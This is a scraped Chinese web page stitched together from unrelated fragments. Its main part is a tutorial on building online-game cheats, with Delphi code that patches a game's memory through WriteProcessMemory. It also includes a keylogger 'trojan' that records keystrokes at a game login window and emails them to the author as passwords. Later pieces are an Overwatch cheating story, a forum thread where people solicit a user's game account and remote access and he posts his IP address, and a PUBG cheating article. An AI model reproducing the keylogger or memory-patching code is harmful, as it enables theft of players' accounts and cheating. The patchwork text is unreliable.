网络游戏外挂是怎么制作出来的？
外挂无非分以下几种（依制作难度）：
1、动作式，所谓动作式，就是指用API发命令给窗口或API控制鼠标、键盘等，使游戏里的人物进行流动或者攻击，最早以前的“石器”外挂就是这种方式
本地修改式，这种外挂跟传统上的一些游戏修改器没有两样，做这种外挂在编程只需要对内存地址有一点认识并且掌握API就可以实现，它的难点在于找到那些地
址码，找地址一般地要借助于别人的工具，有的游戏还有双码校验，正正找起来会比较困难。这种外挂&需要有对内存地址的理解及应用能力
3、木马式，这种外挂的目的是帮外挂制作者偷到用户的密码，做这种外挂有一定的难度，需要HOOK或键盘监视技术做底子，才可以完成，它的原理是先首截了用户的帐号或密码，然后发到指定邮箱
4、加速式，这种外挂可以加快游戏的速度
5、封包式，这种外挂是高难度外挂，需要有很强的编程功力才可以写得出来。它的原理是先截取封包，后修改，再转发。这种外挂适用于大多数网络游戏，像WPE及一些网络游戏外挂都是用这种方式写成的，编写这种外挂需要apihook技术，winsock技术
　　这几种外挂之中，用ＶＣ等底层支持比较好的编程工具才好实现。
外挂制作（由浅至深）：
先，先来谈一下动作式的外挂，这是最简单的一种。记得还在“石器”时代的时候，我看到别人挂着一种软件（外挂）人物就可以四外游走（当时我还不知道外挂怎
么回事^_^），于是找了这种软件过来研究（拿来后才听别人说这叫外挂），发现这种东东其实实现起来并不难，仔佃看其实人物的行走无非就是鼠标在不同的地
方点来点去而已，看后就有实现这功能的冲动，随后跑到MSDN上看了一些资料，发现这种实现这几个功能，只需要几个简单的API函数就可以搞定：
1、首先我们要知道现在鼠标的位置（为了好还原现在鼠标的位置）所以我们就要用到API函数GetCursorPos，它的使用方法如下：
BOOL&GetCursorPos(&LPPOINT&lpPoint&//&address&of&structure&for&cursor&position&);
2、我们把鼠标的位置移到要到人物走到的地方，我们就要用到SetCursorPos函数来移动鼠标位置，它的使用方法如下：
BOOL&SetCursorPos(
int&X,&//&horizontal&position&
int&Y&//&vertical&position
3、模拟鼠标发出按下和放开的动作，我们要用到mouse_event函数来实现，具休使用方法用下：
VOID&mouse_event(
DWORD&dwFlags,&//&flags&specifying&various&motion/click&variants
DWORD&dx,&//&horizontal&mouse&position&or&position&change
DWORD&dy,&//&vertical&mouse&position&or&position&change
DWORD&dwData,&//&amount&of&wheel&movement
DWORD&dwExtraInfo&//&32&bits&of&application-defined&information
在它的dwFlags处，可用的事件很多如移动MOUSEEVENTF_MOVE，左键按下MOUSEEVENTF_LEFTDOWN，左键放开MOUSEEVENTF_LEFTUP，具体的东东还是查一下MSDN吧~~~~~
好了，有了以前的知识，我们就可以来看看人物移走是怎么实现的了：
getcursorpos(point);
setcursorpos(ranpoint(80,windowX),ranpoint(80,windowY));//ranpoint是个自制的随机坐标函数
mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);
mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);
setcursorpos(point.x,point.y);
了以上的代码，是不是觉得人物的游走很简单啦~~，举一仿三，还有好多好东东可以用这个技巧实现，接下来，再看看游戏里面自动攻击的做法吧（必需游戏中攻
击支持快捷键的），道理还是一样的，只是用的API不同罢了~~~，这回我们要用到的是keybd_event函数，其用法如下：
VOID&keybd_event(
BYTE&bVk,&//&virtual-key&code
BYTE&bScan,&//&hardware&scan&code
DWORD&dwFlags,&//&flags&specifying&various&function&options
DWORD&dwExtraInfo&//&additional&data&associated&with&keystroke
我们还要知道扫描码不可以直接使用，要用函数MapVirtualKey把键值转成扫描码，MapVirtualKey的具体使用方法如下：
UINT&MapVirtualKey(
UINT&uCode,&//&virtual-key&code&or&scan&code
UINT&uMapType&//&translation&to&perform
好了，比说此快接键是CTRL+A，接下来让我们看看实际代码是怎么写的：
keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),0,0);
keybd_event(65,mapvirtualkey(65,0),0,0);
keybd_event(65,mapvirtualkey(65,0),keyeventf_keyup,0);
keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),keyeventf_keyup,0);
首先模拟按下了CTRL键，再模拟按下A键，再模拟放开A键，最后放开CTRL键，这就是一个模拟按快捷键的周期。
本地修改式外挂的整个制作过程进行一个详细的分解。
我所知，本地修改式外挂最典型的应用就是在“精灵”游戏上面，因为我在近一年前（“精灵”还在测试阶段），我看了一下游戏的数据处理方式，发现它所发送到
服务器上的信息是存在于内存当中（我看后第一个感受是：修改这种游戏和修改单机版的游戏没有多大分别，换句话说就是在他向服务器提交信息之前修改了内存地
址就可以了），当时我找到了地址于是修改了内存地址，果然，按我的想法修改了地址，让系统自动提交后，果然成功了~~~~~，后来“精灵”又改成了双地址
校检，内存校检等等，在这里我就不废话了~~~~，OK，我们就来看看这类外挂是如何制作的：
在做外挂之前我们要对Windows的内存
有个具体的认识，而在这里我们所指的内存是指系统的内存偏移量，也就是相对内存，而我们所要对其进行修改，那么我们要对几个Windows&API进行了
解，OK，跟着例子让我们看清楚这种外挂的制作和API的应用（为了保证网络游戏的正常运行，我就不把找内存地址的方法详细解说了）：
1、首先我们要用FindWindow,知道游戏窗口的句柄，因为我们要通过它来得知游戏的运行后所在进程的ID，下面就是FindWindow的用法：
HWND&FindWindow(
LPCTSTR&lpClassName,&//&pointer&to&class&name
LPCTSTR&lpWindowName&//&pointer&to&window&name
2、我们GetWindowThreadProcessId来得到游戏窗口相对应进程的进程ID，函数用法如下：
DWORD&GetWindowThreadProcessId(
HWND&hWnd,&//&handle&of&window
LPDWORD&lpdwProcessId&//&address&of&variable&for&process&identifier
3、得到游戏进程ID后，接下来的事是要以最高权限打开进程，所用到的函数OpenProcess的具体使用方法如下：
HANDLE&OpenProcess(
DWORD&dwDesiredAccess,&//&access&flag&
BOOL&bInheritHandle,&//&handle&inheritance&flag&
DWORD&dwProcessId&//&process&identifier&
在dwDesiredAccess之处就是设存取方式的地方，它可设的权限很多，我们在这里使用只要使用PROCESS_ALL_ACCESS&来打开进程就可以，其他的方式我们可以查一下MSDN。
打开进程后，我们就可以用函数对存内进行操作，在这里我们只要用到WriteProcessMemory来对内存地址写入数据即可（其他的操作方式比如
说：ReadProcessMemory等，我在这里就不一一介绍了），我们看一下WriteProcessMemory的用法：
BOOL&WriteProcessMemory(
HANDLE&hProcess,&//&handle&to&process&whose&memory&is&written&to&
LPVOID&lpBaseAddress,&//&address&to&start&writing&to&
LPVOID&lpBuffer,&//&pointer&to&buffer&to&write&data&to
DWORD&nSize,&//&number&of&bytes&to&write
LPDWORD&lpNumberOfBytesWritten&//&actual&number&of&bytes&written&
5、下面用CloseHandle关闭进程句柄就完成了。
这就是这类游戏外挂的程序实现部份的方法，好了，有了此方法，我们就有了理性的认识，我们看看实际例子，提升一下我们的感性认识吧，下面就是XX游戏的外挂代码，我们照上面的方法对应去研究一下吧：
ResourceOffset:&dword&=&$;
resource:&dword&=&;
ResourceOffset1:&dword&=&$;
resource1:&dword&=&;
ResourceOffset2:&dword&=&$0043FA50;
resource2:&dword&=&1280185;
ResourceOffset3:&dword&=&$0043FA54;
resource3:&dword&=&;
ResourceOffset4:&dword&=&$0043FA58;
resource4:&dword&=&;
hw&:=&FindWindow('XX',&nil);
if&hw&=&0&then
GetWindowThreadProcessId(hw,&@pid);
h&:=&OpenProcess(PROCESS_ALL_ACCESS,&false,&pid);
if&h&=&0&then
if&flatcheckbox1.Checked=true&then
WriteProcessMemory(h,&Pointer(ResourceOffset),&@Resource,&sizeof(Resource),&tt);
WriteProcessMemory(h,&Pointer(ResourceOffset1),&@Resource1,&sizeof(Resource1),&tt);
if&flatcheckbox2.Checked=true&then
WriteProcessMemory(h,&Pointer(ResourceOffset2),&@Resource2,&sizeof(Resource2),&tt);
WriteProcessMemory(h,&Pointer(ResourceOffset3),&@Resource3,&sizeof(Resource3),&tt);
WriteProcessMemory(h,&Pointer(ResourceOffset4),&@Resource4,&sizeof(Resource4),&tt);
MessageBeep(0);
CloseHandle(h);
这个游戏是用了多地址对所要提交的数据进行了校验，所以说这类游戏外挂制作并不是很难，最难的是要找到这些地址。
前介绍过的动作式，本地修改式外挂是真正意义上的外挂，而今天本文要介绍的木马式外挂，可能大多像木马吧，是帮助做外挂的人偷取别人游戏的帐号及密码的东
东。因为网络上有此类外挂的存在。要做此类外挂的程序实现方法很多（比如HOOK，键盘监视等技术），因为HOOK技术对程序员的技术要求比较高并且在实
际应用上需要多带一个动态链接库，所以在文中我会以键盘监视技术来实现此类木马的制作。键盘监视技术只需要一个.exe文件就能实现做到后台键盘监视，这
个程序用这种技术来实现比较适合。
在做程序之前我们必需要了解一下程序的思路：
1、我们首先知道你想记录游戏的登录窗口名称。
2、判断登录窗口是否出现。
3、如果登录窗口出现，就记录键盘。
4、当窗口关闭时，把记录信息，通过邮件发送到程序设计者的邮箱。
第一点我就不具体分析了，因为你们比我还要了解你们玩的是什么游戏，登录窗口名称是什么。从第二点开始，我们就开始这类外挂的程序实现之旅：
那么我们要怎么样判断登录窗口虽否出现呢？其实这个很简单，我们用FindWindow函数就可以很轻松的实现了：
HWND&FindWindow(
LPCTSTR&lpClassName,&//&pointer&to&class&name
LPCTSTR&lpWindowName&//&pointer&to&window&name
实际程序实现中，我们要找到'xx'窗口，就用FindWindow(nil,'xx')如果当返回值大于0时表示窗口已经出现，那么我们就可以对键盘信息进行记录了。
先首我们用SetWindowsHookEx设置监视日志，而该函数的用法如下：
HHOOK&SetWindowsHookEx(
int&idHook,&//&type&of&hook&to&install
HOOKPROC&lpfn,&//&address&of&hook&procedure
HINSTANCE&hMod,&//&handle&of&application&instance
DWORD&dwThreadId&//&identity&of&thread&to&install&hook&for&
在这里要说明的是在我们程序当中我们要对HOOKPROC这里我们要通过写一个函数，来实现而HINSTANCE这里我们直接用本程序的HINSTANCE就可以了，具体实现方法为：
hHook&:=&SetWindowsHookEx(WH_JOURNALRECORD,&HookProc,&Hinstance,&0);&
而HOOKPROC里的函数就要复杂一点点：
function&HookProc(iCode:&&wParam:&wP&lParam:&lParam):&L&&
if&findedtitle&then&//如果发现窗口后
if&(peventmsg(lparam)^.message&=&WM_KEYDOWN)&then&//消息等于键盘按下
hookkey&:=&hookkey&+&Form1.Keyhookresult(peventMsg(lparam)^.paramL,&peventmsg(lparam)^.paramH);&//
通过keyhookresult（自定义的函数，主要功能是转换截获的消息参数为按键名称。我会在文章尾附上转化函数的）转换消息。
If&length(hookkey)&&&0&then&//如果获得按键名称
Write(hookkeyFile,hookkey);&//把按键名称写入文本文件
hookkey&:=&'';&
以上就是记录键盘的整个过程，简单吧，如果记录完可不要忘记释放呀，UnHookWindowsHookEx(hHook)，而Hhook,就是创建setwindowshookex后所返回的句柄。
我们已经得到了键盘的记录，那么现在最后只要把记录的这些信息发送回来，我们就大功造成了。其他发送这块并不是很难，只要把记录从文本文件里边读出来，用DELPHI自带的电子邮件组件发一下就万事OK了。代码如下：
assignfile(ReadFile,'hook.txt');&//打开hook.txt这个文本文件
reset(ReadFile);&//设为读取方式
While&not&Eof(ReadFile)&do&//当没有读到文件尾
Readln(ReadFile,s,j);&//读取文件行
body:=body+s;&
closefile(ReadFile);&//关闭文件
nmsmtp1.EncodeType:=uuM&//设置编码
nmsmtp1.PostMessage.Attachments.Text:='';&//设置附件
nmsmtp1.PostMessage.FromAddress:='';&//设置源邮件地址
nmsmtp1.PostMessage.ToAddress.Text:='';&/设置目标邮件地址
nmsmtp1.PostMessage.Body.Text:='密码'+'&'+&//设置邮件内容
nmsmtp1.PostMessage.Subject:='password';&//设置邮件标题
nmsmtp1.SendM&//发送邮件
这个程序全部功能已经实现，编编试试~~~对了，我以前写的类似的作品可以在上找得到。
已投稿到：
以上网友发言只代表其个人观点，不代表新浪网的观点或立场。20被浏览12,609分享邀请回答22 条评论分享收藏感谢收起
http://v.qq.com/page/b/w/x/b0308e8txwx.html
通过查询，可以发现 Gegury 的战绩极为惊人：46小时的毛妹使用时间，423场使用记录，赢了其中的339场，胜率80%！KDA高达6.31！这特么不是开挂了么？这肯定开挂了！- 2 -《守望先锋》是暴雪爸爸的游戏，而大家都知道，暴雪爸爸对开挂作弊是0容忍的。所以，Gegury 的对手们纷纷举报，以“有使用外挂嫌疑”为理由，把这事儿告到了韩国暴雪。然而……不像某鹅调查某代打事件一样耗时，韩国暴雪的调查仅用了2天就给出了结论：“Gegury 选手并没有使用外挂程序！”啪啪啪！有些人脸被打肿了！根据媒体的回访，Dizziness 战队那2位发“毒誓”的选手，确实放弃了这次比赛（这作死技能我给满分，技不如人，回家好好练练，下次再来吧！）事情没完，还有后续。Gegury 在直播节目中露面，用屏幕和鼠标多角度，露手直播。之后，人们又一次被她的操作震撼了……右键神准，开盾时机和配合队友及时放大的意识也很好。这样的露手，与天朝某影后代打事件出奇的相似，但其中的巧合，却让人们觉得这真是绝佳的嘲讽。非凡的实力背后，是大量的努力练习。可以看到 Gegury 对毛妹是真爱，“亮眼时刻”全是毛妹。在之后的节目采访中，戴着假面上场的 Gegury 坦言，自己在过去的日子里，由于背负作弊骂名而倍感压力，说到这，她潸然泪下，并说自己本来可以打得更好的。（她还只是个孩子啊！你们这些喷子们！）- 3 -难道女玩家就一定菜，一定要受歧视？阿怡代打事件发酵时，Miss被人带节奏难道对方表现出压倒性的优势，把自视甚高的你按倒在地摩擦了无数个回合后，你所能想到的，就只有“对方一定开挂了”，而不是“我特么这局打的跟翔一样”？大家都知道“燕雀安知鸿鹄之志”这句话，同样的道理，“菜鸟安知天才之强”。那些怀疑 Gegury 实力的对手，首先的依据，是自己被 Gegury 恐怖的实力击败了；其次是 Gegury 特殊的身份，而作为证据的比赛视频中，其实并没有能一口咬定 Gegury 开挂的证据。所以，G点君认为，这些瞎BB的选手们，充其量，也只是一群菜鸡——因为，他们把别人通过努力达到的技术，当成只有外挂才能完成的操作。这不仅是单纯的不自信，对操作上限的错估，和对战局的错估一样，是实力硬伤的表现！在《守望先锋》中，G点君和基友们也曾遇到过疑似开挂的玩家，当基友们高喊“对面那个半藏肯定开挂了！”，准备在比赛频道带一波互喷节奏时，G点君的第一反应，往往是查看对方的生涯概况。国服第一半藏的数据，注意看场数。资料来源：max+和masteroverwatch当看到对方在半藏这个英雄上，付出了成吨的时间和一贯高水准的命中率后，G点君还会再观察自己的死亡回放，反省自己的走位不慎——然后平静地在语音里说一句，“恕我直言，在座的各位，包括我在内的大家，都是垃圾。人家的半藏，是真的强。”当然，这只是G点君和基友开玩笑互黑的日常，并不是号召大家开喷。但是，你若要带一波针对谁谁谁的节奏，没有证据，你怎么攒一波大的带走对面？毛主席说过的嘛~“没有调查就没有发言权”。阿怡演了这么久，为何最终被“LOL小鸿”戳破？就因为人家16分40秒的视频里，全是证据，再怎么洗地，那些刺眼的东西，你刷不掉、洗不白！而真正战五渣的菜鸡，啄不过对手，一言不合就会一秒五喷。看看上个月发生的这件事吧：就G点君自己而言，我自知没有几斤几两，除了日常在开黑的基友面前吹吹水逼，在游戏中一向是低调发言，高调打枪。毕竟，我们是菜鸟啊！要想嘲讽对面，还是练到能碾压对面了再说吧~不多说了，车来了，我要前往多拉多了。49 条评论分享收藏感谢收起玩游戏开挂出现的这个问题怎么解决？_百度知道
玩游戏开挂出现的这个问题怎么解决？
这不是让你在C盘的Xf.ini文件里添加路径吗，你把你dnf的路径加进去不就行了
qq远程 可以吗？
大神，帮我搞一下可以吗？
真的是急用
采纳率：60%
提供账号我们
工作室可以帮你破解
怎么解封？
你游戏账号发给我
我们工作室可以帮你快速破解，
你丫盗我号怎么办？
他妈这系统问题好不？
提供游戏账号，就可以，我们不需要你的密码
诚信交易信誉保证，拿钱办事
是账号问题
我游戏都没上
我是在开挂，你懂不懂
给我你的电脑ip我远程帮你修复
这是外挂软件，找不到文件，你懂吗？
给我你的电脑ip我远程帮你修复，
给我你的电脑ip我远程帮你修复，，
给我你的电脑ip我远程帮你修复，，，
给我你的电脑ip我远程帮你修复，，，，
给我你的电脑ip我远程帮你修复，，，，，
给我你的电脑ip我远程帮你修复，，，，，，
给我你的电脑ip我远程帮你修复，，，，，，，
老子搞不好 只有QQ你加不加算了 我去找别人
我的电脑ip113.57.191.43
为您推荐：
其他类似问题
玩游戏的相关知识
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。游戏的外挂是怎么回事哦？
var sogou_ad_id=731549;
var sogou_ad_height=160;
var sogou_ad_width=690;您的位置：
绝地求生大逃杀外挂为什么这么多_游戏外挂猖獗原因分析
绝地求生大逃杀外挂为什么这么多？绝地求生大逃杀是最近最火的游戏，而且人气超越了LOL，不过这款游戏和之前的守望先锋一样外挂实在是太多了，那为什么这款游戏外挂那么猖獗的呢？
吃鸡这游戏开挂的太多，有跑的比车快的，有穿墙打黑枪的，官方也不管管，我飞在天上看的一清二楚。
小编刚刚开个玩笑，真实的情况是：
Round1，跑动中我被汤姆逊爆头，二级头，距离200米.....
Round2，跑毒时两轮摩托100km时速扫射爆头，三级头，距离不明.....
Round3，消声m4.....距离不明......
绝地求生外挂层出不穷，官方为打击外挂，曾一天内封禁42000个账号！这当中除了普通玩家，在吃鸡主播圈使用外挂也是一种普遍现象。魔音糯米首当其冲，接着是油条再被质疑。可要说职业战队队员开挂，你是什么感觉？
前一阵，《绝地求生大逃杀》国际邀请赛经落下帷幕。排名前三名的XZ战队、YQHP战队、iFTY战队戏，获得了到韩国釜山参加G-Star国际赛事的资格。
小组赛排名19的XZ战队在最后以较大优势获得冠军，引起了观众不服，认为XZ战队使用了&透视&外挂。原因是因为比赛中经常见不到XZ，然后决赛圈突然就XZ出现在了圈中间，一路上还碰不到敌人。
结果却是个大反转，官方调查证明，XZ战队游戏过程没有问题，反而查处了MAX战队代打。至于是真代打，还是官方为保留颜面，将外挂说成代打，吃瓜群众就不得而知了。
想学习XZ战队的吃鸡战术？虎牙第二届绝地求生赏金赛即刻开始，虎牙的XZ战队也会参加，这是一个找出&实锤&的好时刻！更有总价值高达70万元的赛事奖金！
比赛还设有娱乐区，据说只要会玩吃鸡就行，哪怕你从来没吃到过。是不是听起来就美滋滋~你还等什么！
手机游戏排行
最新游戏专题
||||CopyRight2014年-2017年 497.Com 497电玩 All Rights Reserved
备案编号:湘ICP备号